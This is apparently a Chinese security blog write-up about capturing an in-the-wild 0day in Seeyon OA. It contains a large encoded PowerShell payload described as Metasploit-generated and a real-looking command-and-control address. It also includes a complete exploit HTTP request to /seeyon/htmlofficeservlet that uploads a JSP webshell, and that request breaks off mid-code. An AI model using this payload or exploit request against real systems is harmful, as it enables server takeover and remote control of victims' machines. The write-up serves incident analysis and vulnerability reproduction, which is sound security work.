SgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBA

对上传到XXX.XXX.XXX.XXX的powershell样本进行了样本分析,确认这个是MSF框架生成的payload,cs和msf都能用,cc回连ip是:114.118.83.230:443

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(8)

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(9)

复现

确认存在/seeyon/htmlofficeservlet,出现如下特征

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(10)

抓包使用exp直接开干

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(11)

访问xxx/seeyon/htmlofficeservlet

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(12)

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(13)

测试包

POST /seeyon/htmlofficeservlet HTTP/1.1 Host: xxx.xxx.xxx.xxx Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=33922F56D3C24855471709AD623CE205; loginPageURL= Connection: close Content-Length: 1121 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String

*本文作者:F12

,